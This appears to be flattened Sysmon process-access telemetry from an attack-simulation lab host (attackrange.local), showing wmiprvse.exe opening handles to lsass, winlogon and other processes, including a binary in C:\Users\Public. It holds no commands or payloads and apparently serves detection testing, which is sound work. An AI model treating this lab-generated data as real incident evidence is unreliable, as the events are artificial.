15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.991{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.991{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 